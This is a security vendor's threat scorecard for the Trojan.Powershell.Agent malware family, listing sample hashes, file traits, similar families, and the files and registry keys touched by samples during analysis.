Trojan.Powershell.Agent
Threat Scorecard
EnigmaSoft Threat Scorecard
EnigmaSoft Threat Scorecards are assessment reports for different malware threats which have been collected and analyzed by our research team. EnigmaSoft Threat Scorecards evaluate and rank threats using several metrics including real-world and potential risk factors, trends, frequency, prevalence, and persistence. EnigmaSoft Threat Scorecards are updated regularly based on our research data and metrics and are useful for a wide range of computer users, from end users seeking solutions to remove malware from their systems to security experts analyzing threats.
EnigmaSoft Threat Scorecards display a variety of useful information, including:
Popularity Rank: The ranking of a particular threat in EnigmaSoft’s Threat Database.
Severity Level: The determined severity level of an object, represented numerically, based on our risk modeling process and research, as explained in our Threat Assessment Criteria.
Infected Computers: The number of confirmed and suspected cases of a particular threat detected on infected computers as reported by SpyHunter.
See also Threat Assessment Criteria.
| Popularity Rank: | 2,276 |
| Threat Level: | 80 % (High) |
| Infected Computers: | 703 |
| First Seen: | May 24, 2024 |
| Last Seen: | April 22, 2026 |
| OS(es) Affected: | Windows |
Table of Contents
Analysis Report
General information
| Family Name: | Trojan.Powershell.Agent |
|---|---|
| Signature status: | No Signature |
Known Samples
Known Samples
This section lists other file samples believed to be associated with this family.|
MD5:
08d5f2eb217462e79b6bd715106e6841
SHA1:
20c4947f3f7656db2b7c8afe296be29ea167f0c3
File Size:
1.45 MB, 1451008 bytes
|
|
MD5:
88cbcc7cceb5e27561a74ea558fe1764
SHA1:
7e7e7fb8de0c81f691290ca8a776e62582dcb148
File Size:
4.70 MB, 4699648 bytes
|
|
MD5:
41bfb061e5dddda9430f0c481c437acc
SHA1:
6f66173cc78af31e2945ab897ff46b3878a41e05
SHA256:
17DBEAA8C773B672DBCC60332CBED5A98E94B8156026B2001B108AFFFE30D602
File Size:
3.43 MB, 3429888 bytes
|
|
MD5:
a7e2cf6fc18f25427084ee498d068483
SHA1:
8cc6d749f60c02de6d61744d3b15c8bddc404767
SHA256:
FCE2E80D1FEFD53EFB1CBAB82DE9EF6E843C9BEA0074B70C83DA112FC36E8A4A
File Size:
6.98 MB, 6981632 bytes
|
|
MD5:
49dd7ae749a6238a213705cbe0a5867c
SHA1:
36f6413bd3ca800dfc66725d52421babc85b9619
SHA256:
EC90F8AA83D87FC9F3FC3B991025EDB57BF2C1AAE471487D99A73BC1294813AF
File Size:
793.09 KB, 793088 bytes
|
Show More
|
MD5:
daa8a39a60e9b3d0247b656c66eb9401
SHA1:
73637ac26e1840f21877a7dd33782ec7e69bfb14
SHA256:
55BE3E6CDAD379F935AEDEB24D20EB9F418C17D1E9739F872A347ECB9CF78E61
File Size:
315.90 KB, 315904 bytes
|
|
MD5:
3e72a2924cf6f11ddadc98d96d091bf1
SHA1:
0bf30a10a614207d27df8c8fc8e7b50853a52cc4
SHA256:
93A7F2326FBC959458E14647D0D752D1AB7D89C73060B956CD988F321F0DDC26
File Size:
793.09 KB, 793088 bytes
|
|
MD5:
0454c7e4196d9934192c59b55f38c0e2
SHA1:
41c1d68f0782a24e0ec47b2b203d7920bc5267da
SHA256:
3C41E8FDD8AFDAB3277668183CFF32B827DB9CDC8D79E4950322BA19C2BF5120
File Size:
1.43 MB, 1428480 bytes
|
|
MD5:
1f64428c3fe460477a4cb6a16ce87bd8
SHA1:
25df9100dccea20b7e9df01d8985dd359f11c081
SHA256:
6AB1EE6C9AC516605A541B017E57A350FF667724598B5CFEE3FDA9B2427D0AC6
File Size:
3.82 MB, 3824128 bytes
|
|
MD5:
5c7b5e617bb3fa618a852357d539d0b8
SHA1:
00f1b46df4148957f276b77b2270888c8b7a73ca
SHA256:
7595BAADD0ABDE4C20830484D87D14D1FC449230156506E28B1945DD89D8D42D
File Size:
2.52 MB, 2522624 bytes
|
|
MD5:
832008da7d08b720da63728e1cd7b807
SHA1:
819ce40e357612584bd690fc220921b9d4a8431a
SHA256:
B968F3C7FD70D855EF3C7E3E4B285F6CC6D1DE18E8F73BE97D19512E30C6BB71
File Size:
2.93 MB, 2931200 bytes
|
|
MD5:
48a2936aad77328de795bb2604561f33
SHA1:
0b96826eb192ae3f6e17e84c283abf8521267837
SHA256:
A7D8CB503FE3EE74D2E3DC5CB2608755F2D371E6CDF28254BD083313E3A3148A
File Size:
1.29 MB, 1292800 bytes
|
|
MD5:
a104497a8a60a6eaada2ed5cfacf0a61
SHA1:
7107fd33026804fb7da9494d952a46d036f49200
SHA256:
07A9542225DBCEA7747FAE19E6FB61D6D66BD13F5A8554DB5DA2F32D4FA6CB73
File Size:
828.93 KB, 828928 bytes
|
|
MD5:
ebc5d20c8580127e6b8f35f733224cb4
SHA1:
b35794db405d102bc4f07d7df22b923d3717ffa7
SHA256:
0111FFB0DAB4BDEF8C8788E4CE6AD4FC071B9F7B1F3AFFB7EAD8D5DF9582F34F
File Size:
102.91 KB, 102912 bytes
|
|
MD5:
5bdca149cc76d37f7601bd59bd5a0698
SHA1:
2e56f4d8092bf9b829cd1b563f04cd55e2eb599a
SHA256:
B0F2288D042583D0159AD214B37539CD0016F0A4973C3F119B8531C73D5B9D30
File Size:
890.88 KB, 890880 bytes
|
|
MD5:
78bf2e1d6172c05203a44dc1ee91a4cf
SHA1:
0e199c55c8195b8b3536317853da28ce2dbbb666
SHA256:
8C1254B01C0FCF31315D6A196BCF3AE56CA2BEB53B23ABEA39B9C0F4281D6E13
File Size:
103.42 KB, 103424 bytes
|
|
MD5:
fd4a6c90472422c282333dce2acdda2c
SHA1:
28af085b96c937048d463741bc75a38dd37fdfc3
SHA256:
1CE64B0EF7130995561CCE7D149D6DE4611688EDC19016919252560FBCF046B1
File Size:
105.47 KB, 105472 bytes
|
|
MD5:
4e1de47f1ec3764fd140b81d7335fa87
SHA1:
7ce1d3e581ff3fe908b8ea9a2e5a9ef6d9781378
SHA256:
6547810C3106FD8F9F77B1E02FE3F90FF4C5A3148ED594143142E2944CDDD1CF
File Size:
107.01 KB, 107008 bytes
|
|
MD5:
09f99eedb2f4a357328769bfb7eb831a
SHA1:
ada3218132154506f9959f6667800eb3e72ffcdb
SHA256:
B982E7778974E6B663559A7B4B0DD7A932386D99DD0A700E6BF53E47402F955D
File Size:
14.85 KB, 14848 bytes
|
|
MD5:
0fd7a56466d976e5ad99f72fde2df901
SHA1:
075ce8c6a8190bfa4f9facbb57cdc728e7ba52ea
SHA256:
327CCB68C662D065BBC780E6C3A587EB396B2534DB1963C266A2DA5685D6B594
File Size:
828.93 KB, 828928 bytes
|
|
MD5:
44b147bdcee1b318cc600da432b1d3b7
SHA1:
872285bad4e55235da29176c198c9d8ceef642d6
SHA256:
C659D53996E5942B7C4B4C8EB1C3C428694EF419D6F4E0C8BDBC48F0F42D2650
File Size:
954.37 KB, 954368 bytes
|
|
MD5:
239b0dc9d9f719f22d1f10b7732e1517
SHA1:
6ea26f667239fc5b8f97c6f9fc57f20ca9a2797b
SHA256:
D686F5FEDD912CE975295D1BC4C8A8A5318BCF6DEFA1F0E47BB360FA4A6E4FEC
File Size:
2.70 MB, 2695680 bytes
|
|
MD5:
948391bb55536c46a1631eecd85a6ad3
SHA1:
b294096aa12003b9a4c02a02c27250eb5b7a3193
SHA256:
1A02F8A0A30E9304317C9112223F10D846387F58A7F2ACA233372C26F6360B1C
File Size:
3.97 MB, 3971584 bytes
|
|
MD5:
035b01404ba7b407ff9f355899e3d3ab
SHA1:
614fb106c2c82033454af29c0eb6f2a0091f49fa
SHA256:
008255BAD776F0A1EA23D62DB3492D12271F6AFC79513633C1871A7F17B9675D
File Size:
5.67 MB, 5672448 bytes
|
|
MD5:
0671e7721d6fcc509b22d45d8c6fb9d1
SHA1:
607736f2744bc95f8939cc63c5fd6952a9a8c190
SHA256:
102CFE7E470D3C7F9AA27D03E2F4D8BC2FE91E1BA8CAAA880385364501BC6D4A
File Size:
7.27 MB, 7272448 bytes
|
|
MD5:
45acbc93ac5ab112dac8bbb47c36ae3f
SHA1:
b93dc317de9e6f50f25d83df63c6d107591118d1
SHA256:
F4844BD993221CDD68170BB2BA74F6C0CD4B235E9803D1BF5E4CD00B6772D42C
File Size:
793.09 KB, 793088 bytes
|
|
MD5:
a01ccc8635289b0ba0e7e14564c89b42
SHA1:
8db8a7f12b0812611769554df5f2815dab492237
SHA256:
41F6E49552441DC6894BA0171FACD9E428C0F34B6AE3730EA5662A0DA6FE15E2
File Size:
451.58 KB, 451584 bytes
|
|
MD5:
b7db4bcee6431350043c52aceb03b337
SHA1:
e273ced962a291ea12ff6bc4fa78342f759eab6d
SHA256:
61EC6D5AB90328AD26044A8CEBCD1545D891E986DF2D2E34BB9DCE1716DDF0F5
File Size:
4.99 MB, 4989440 bytes
|
|
MD5:
f65a8deaa4abe93369e65badab82901d
SHA1:
2bc73a4ae0eb38795c8413f5d8c176fb44d6a89b
SHA256:
4195931149D72AFBD83F4C358EAD64780F56B4D58D58249E49BB99B7BC7ABAE0
File Size:
227.84 KB, 227840 bytes
|
|
MD5:
44c0b21d2a96047a251999e90e2e9169
SHA1:
96c7077d1b99dca84e7f3b5a89e58cb608153ac0
SHA256:
979E32FDFBB01D84E881B1694C74C7D7D3CC272D7D1FBDF26A0E89DDB48331AD
File Size:
843.78 KB, 843776 bytes
|
|
MD5:
44687b5cc789a7f9c66a49fe87b3f4fe
SHA1:
dd13b1b470d80d06a516e12106bfa93623d20181
SHA256:
1D68A55EC21B02E157CDF0F43FB8B2B2E519272B9039551DC7415370D3F01E34
File Size:
1.25 MB, 1249280 bytes
|
|
MD5:
e20fde1ce1a5f6929978ce2d8a399ed7
SHA1:
216eede3e8b0a2ec3fa32fe2ab38dabd2bd6f3f0
SHA256:
9958A6BD9B99460FFBB8F0E1E104BD71FA2FAB48BA2FDCF845AC0C0F1C592120
File Size:
1.76 MB, 1756672 bytes
|
|
MD5:
0591317b54ca96d3cc7d15e4a0ab3bd1
SHA1:
23d7ee487ac34927af9f3c7951de68ae91d64927
SHA256:
1EEEC6B4A1855AD3B95673D692CE47E6CE660019A168154D37429836E53C5EEC
File Size:
2.13 MB, 2128896 bytes
|
|
MD5:
a7095142a0eeeb90ad8d28d6b421c9e3
SHA1:
14c17e5f69e6e5074c60adec8409066514a2e434
SHA256:
CE73A8A3E2C87BD9BCFBB0C51C5A1F0ED68496C587A336E00EB4D2619C49E402
File Size:
921.09 KB, 921088 bytes
|
|
MD5:
e657959541358a1d8b6ce4476481e8c9
SHA1:
91b2a1efb00868895c3066b4316240a124970588
SHA256:
54E0AE616663663BE19486D8FE6568555B4BD7CDED4A20901DC99FD2EE4AE9A7
File Size:
451.07 KB, 451072 bytes
|
|
MD5:
0adada6a7d10771d9a600368c161cc2b
SHA1:
f0503cac501a0c3ab8a2329da66a2173903b0e65
SHA256:
991354AB43325557A64C01E33BCD27C88B840BB74372CF7BEA291D46AE35EB23
File Size:
923.65 KB, 923648 bytes
|
|
MD5:
3cdcb0696c0ab363609e5108d453eb25
SHA1:
ee563284fc8728b68a73c02c0721a91766939850
SHA256:
6F91BCE3522FC9171F3058DA1FD8097AE11FF7452E6DC188D449BF225EC2B82F
File Size:
4.01 MB, 4011008 bytes
|
|
MD5:
098f49d10512c6fecc7b3a97055a1905
SHA1:
54ec8cb895d252dee5fc009c2f9f1359f64c1caf
SHA256:
1781A39F4E8A36D04A788C2900CB152127FB12C464A34267A5473A517C46B402
File Size:
3.83 MB, 3829248 bytes
|
|
MD5:
bcc1ad9e951e608562da3afa2f464fef
SHA1:
7d9f33a14e185b2b13346cbe43a1fa55a8f44307
SHA256:
F14E9AB8D1AE326ABC6452749CF95A1A94D1227C7FA94B86C6F41F37810DAADB
File Size:
450.56 KB, 450560 bytes
|
|
MD5:
9aa7d7a212371c1f7da623a3efe7a2f6
SHA1:
3a74578d7c8ab3ab68efdbcb8b6e5835c0d5aa57
SHA256:
DE0F7DFA69510A107B4F88AD47EDFDEE1F529B26B23633E9360852FC82D4D13F
File Size:
972.29 KB, 972288 bytes
|
|
MD5:
21e73b4ce02863b18a01a79fb672ed45
SHA1:
106f9362000efd662664631657edea43c1e98fa8
SHA256:
8BC3641C5B7FAF88AF4D8F4AF60266EDF1611F04BFF281D95E64773E22B38C1A
File Size:
514.56 KB, 514560 bytes
|
|
MD5:
164373f800f4e5cb67d9507e83168e54
SHA1:
4ea241ccfcf42c0a31d7f2dbf78fc51ae8db791e
SHA256:
0CBBD57284203749C0B7894206C38819C86902F4A407DDF1207BFB6EB636A2E2
File Size:
451.58 KB, 451584 bytes
|
|
MD5:
3893c4683616d1a82252c3388ba7b205
SHA1:
f2ffb6de24332aee62d7bc0cbd40655a8800ad99
SHA256:
2230CD657793871F75C6FDF3337A128227986EA8FDC1BDA0861883439866EEF3
File Size:
345.60 KB, 345600 bytes
|
|
MD5:
fb61d9b203f29f63b00ede8792906e11
SHA1:
d661cd9180fefffa8ab4fd42ba8695b485944458
SHA256:
EADFBEAB81C8404C48FCC2A5B05649FBD6E33C99A00914D864CD79D0E726C3F5
File Size:
856.58 KB, 856576 bytes
|
|
MD5:
5d6ce9f2595d8a5d321fb5b401d0f936
SHA1:
45db803015736162ddad19e57771f63635e09e36
SHA256:
4B648EAA723D7417569995B37325BCDB562D1AEF3A226410607855AE6B2FF86F
File Size:
2.11 MB, 2109440 bytes
|
|
MD5:
7c85e29be9e1c7d6903bfaff94f0a52a
SHA1:
691394f7848c036efed74847d359ae7fd708c5a5
SHA256:
7EF83239F6D2A1A653882DE2DF0861DDAFFBC272082F580788CD6593BD6EFE14
File Size:
3.72 MB, 3721728 bytes
|
|
MD5:
4cdecd98fcbb91a34db3d65244977ac9
SHA1:
996ee23a60e2aa1f4aee4f1d3c579ee437671775
SHA256:
316DF7BA373E28A208944CCA5F6D720746F974DFE69C32004EF1156E8F3C6AA1
File Size:
894.98 KB, 894976 bytes
|
|
MD5:
d6d2677050f18db484f1c88b8e49a248
SHA1:
b993fa25a382cd62212ae1a5c0600a2ce3a8891e
SHA256:
80F1B0B6ACDC093B18945C1B35EE567E8C6A6BD7D33516AD681ADBBF53FEA236
File Size:
5.68 MB, 5684224 bytes
|
|
MD5:
56af620094800984379608f6841acbe6
SHA1:
2b34eb1b0c02fe6ce336d008032bfbda245cb254
SHA256:
BAA60BACCF4D73529EEA445348B71A06700A18C185688207C032772B16AAF491
File Size:
2.17 MB, 2166272 bytes
|
|
MD5:
25a271010b3c9a3209759fcb803208f1
SHA1:
99dd79bafed6cbe171c289592c9227a0b471ee4a
SHA256:
F67E4EA85520CF21B063960CBF3BC0593584F11B320C7595AC9DF435126E011D
File Size:
6.09 MB, 6088704 bytes
|
|
MD5:
218693cc0b9b2d35538d2a01d0127d2b
SHA1:
6ee7ddb13eb50078e89e27d8ecd3a6f03142a757
SHA256:
097A53398B9558D613E8001154D011E07356DC2EEABE05A36A5F5AFBD00D38D5
File Size:
691.20 KB, 691200 bytes
|
|
MD5:
8ef07bae63832835b61269e959049703
SHA1:
6152b7069ad74180002a5ce599f9eb957795ea2c
SHA256:
110BFC0A4BD731D287CDAB7CBC112ACAF4F2D3293520C8028C71AD31C2A9440D
File Size:
1.40 MB, 1395200 bytes
|
|
MD5:
428a6b5802387208774b56dd16cbdec7
SHA1:
16ae5231a7e9b8a1eee7f0defa65eeb9fe6dbcf3
SHA256:
5F42F32778023746A8A5A531A380532EBBF7F09413D556654BAF000EDADA4782
File Size:
88.58 KB, 88576 bytes
|
|
MD5:
787a515cc27a8901434d245e11e9fab6
SHA1:
2f65ae4188b4a6ae19e49bc4ca250a454c9263e8
SHA256:
5BAD25AD2E07C1AE0126C9A48EF6245590BA018A7E2B8BE405ECAC53CCE858C8
File Size:
4.22 MB, 4224000 bytes
|
|
MD5:
1ea670d563ea7de167ed2122fd760cf1
SHA1:
d39364c53971b68e2303e0e86ff983eda1d59461
SHA256:
52251986EE69187024D877A83720A74AA331663B3AD4F4DB1F91196E1948057C
File Size:
345.60 KB, 345600 bytes
|
|
MD5:
5658132c7ff7206cae34d1d50210a3b6
SHA1:
ccebd336e082e2c15eba0b7d641290e7de12d65b
SHA256:
6860ACD93755FAFDC3C595AAF93B5F39500A870E26DE55F02464824BB88FEAD4
File Size:
2.18 MB, 2176000 bytes
|
Windows Portable Executable Attributes
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have relocations information
- File doesn't have resources
- File doesn't have security information
- File has been packed
- File has exports table
- File has TLS information
- File is .NET application
Show More
- File is 32-bit executable
- File is 64-bit executable
- File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
- File is either console or GUI application
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
File Icons
File Icons
This section displays icon resources found within family samples. Malware often replicates icons commonly associated with legitimate software to mislead users into believing the malware is safe.Windows PE Version Information
Windows PE Version Information
This section displays values and attributes that have been set in the Windows file version information data structure for samples within this family. To mislead users, malware actors often add fake version information mimicking legitimate software.| Name | Value |
|---|---|
| Assembly Version | 1.0.0.0 |
| Comments |
|
| Company Name |
|
| File Description |
|
| File Version |
Show More
|
| Info | https://cbservers.xyz/ |
| Internal Name |
|
| Legal Copyright |
|
| Legal Trademarks |
|
| Licence | GPLv3 |
| Original Filename |
|
| Product Name |
|
| Product Version |
Show More
|
File Traits
- 2+ executable sections
- AutoHK
- CryptUnprotectData
- dll
- fptable
- GetConsoleWindow
- HighEntropy
- imgui
- JMC
- No CryptProtectData
Show More
- No Version Info
- ntdll
- packed
- Pastebin
- VirtualQueryEx
- WriteProcessMemory
- x64
- x86
Block Information
Block Information
During analysis, EnigmaSoft breaks file samples into logical blocks for classification and comparison with other samples. Blocks can be used to generate malware detection rules and to group file samples into families based on shared source code, functionality and other distinguishing attributes and characteristics. This section lists a summary of this block data, as well as its classification by EnigmaSoft. A visual representation of the block data is also displayed, where available.| Total Blocks: | 6,236 |
|---|---|
| Potentially Malicious Blocks: | 204 |
| Whitelisted Blocks: | 4,514 |
| Unknown Blocks: | 1,518 |
Visual Map
? - Unknown Block
x - Potentially Malicious Block
Similar Families
Similar Families
This section lists other families that share similarities with this family, based on EnigmaSoft’s analysis. Many malware families are created from the same malware toolkits and use the same packing and encryption techniques but uniquely extend functionality. Similar families may also share source code, attributes, icons, subcomponents, compromised and/or invalid digital signatures, and network characteristics. Researchers leverage these similarities to rapidly and effectively triage file samples and extend malware detection rules.- Agent.DEAB
- Agent.FYL
- Agent.KFP
- ClipBanker.OC
- CobaltStrike.RG
Show More
- CobaltStrike.SR
- CobaltStrike.SU
- Coinminer.LM
- Downloader.Agent.DTB
- Gamehack.GDDB
- Gamehack.SBG
- HackKMS.TC
- Khalesi.D
- KillWin.H
- Kryptik.UGC
- Lamer.CA
- Lamer.CB
- Lamer.E
- PSW.Agent.KF
- ShellcodeRunner.TWA
- Socelars.DD
- St0rm.A
- Stealer.B
- Stealer.BC
- Stealer.BE
- Stealer.T
- TGBot.JA
- Tedy.K
- Trojan.Agent.Gen.ABX
- Wpakill.A
Files Modified
Files Modified
This section lists files that were created, modified, moved and/or deleted by samples in this family. File system activity can provide valuable insight into how malware functions on the operating system.| File | Attributes |
|---|---|
| \device\namedpipe | Generic Read,Write Attributes |
| \device\namedpipe | Generic Write,Read Attributes |
| \device\namedpipe\dav rpc service | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| \device\namedpipe\pshost.134024922551853307.2624.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134076074978190894.7796.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134097517733282670.4668.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134101916156709262.5528.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134101916163151840.4244.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134132712154861456.7136.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134133916596935858.288.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
Show More
| \device\namedpipe\pshost.134165533653723671.6976.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134165533660766602.4968.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134167687803066876.7204.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134167687815039093.8140.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134199906702970088.7036.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134204371861688496.6936.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\wkssvc | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\47f2.tmp\ÈÒÎÃ.bat | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\public\libraries\config.json | Generic Write,Read Attributes |
| c:\users\public\libraries\config.json | Synchronize,Write Attributes |
| c:\users\public\libraries\svchost.exe | Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144 |
| c:\users\public\libraries\svchost.exe | Synchronize,Write Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_13x2ay40.dxx.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_4clnculs.v4s.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_4eok13rs.ezs.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_502surqg.in2.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_b5nhrh2h.2gn.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_be2nb2hi.yj4.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_c4wxmli5.jlz.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_d2uqfkbm.b30.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_ejgtsinr.y41.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_exshymzz.5wl.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_fi1dsmiz.zii.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_ir1hzpd5.2c0.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_jxu20arf.5im.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_k0rdyisr.5j4.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_lwuy2znm.i30.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_lzoj0iwm.j4u.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_n4ncuyly.cgp.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_oecifclt.osb.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_owtgqofe.53l.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_peuaowrr.w43.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_sygyotlw.twh.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_tidom4ic.qdt.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_tjzehqpq.ubq.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_yazac4sh.y3o.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_zfexr2al.g0s.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_zv35vjga.cwa.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\msi2fe1.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\msi432a0.log | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe | Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144 |
| c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe | Generic Write,Read Attributes,Delete,LEFT 262144 |
| c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe | Generic Write,Read Data,Read Attributes,Delete,LEFT 262144 |
| c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe | Read Attributes,Synchronize,Write Data |
| c:\users\user\appdata\local\temp\vcpkg\vcpkge09bc766-dbad-4163-8882-9ef5df4a2b81.txt | Generic Write,Read Attributes |
| c:\users\user\appdata\local\vcpkg\config | Generic Write,Read Attributes |
| c:\users\user\appdata\roaming\ob\windows local.exe | Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144 |
| c:\windows\temp\15293484.ps1 | Generic Write,Read Attributes |
| c:\windows\temp\15298859.ps1 | Generic Write,Read Attributes |
| c:\windows\temp\2155015.ps1 | Generic Write,Read Attributes |
| c:\windows\temp\2160328.ps1 | Generic Write,Read Attributes |
| c:\windows\temp\debug_log.txt | Generic Write,Read Attributes |
Registry Modifications
Registry Modifications
This section lists registry keys and values that were created, modified and/or deleted by samples in this family. Windows Registry activity can provide valuable insight into malware functionality. Additionally, malware often creates registry values to allow itself to automatically start and indefinitely persist after an initial infection has compromised the system.| Key::Value | Data | API Name |
|---|---|---|
| HKLM\software\wow6432node\microsoft\windows nt\currentversion\systemrestore::systemrestorepointcreationfrequency | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ⬃뗸䮮ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 귄풾啺ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 풷퓅啺ǜ | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 핳啺ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 䊿핶啺ǜ | RegNtPreCreateKey |
Show More
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | 꿣 ȁ 獖} | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | @岿棻ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 擝峁棻ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 嵥棻ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 䞬嵨棻ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 溹嵯棻ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\windowspowershell\v1.0\powershell.exe | 縭巀棻ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | 巡棻ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\tracing\rasapi32::enablefiletracing | RegNtPreCreateKey | |
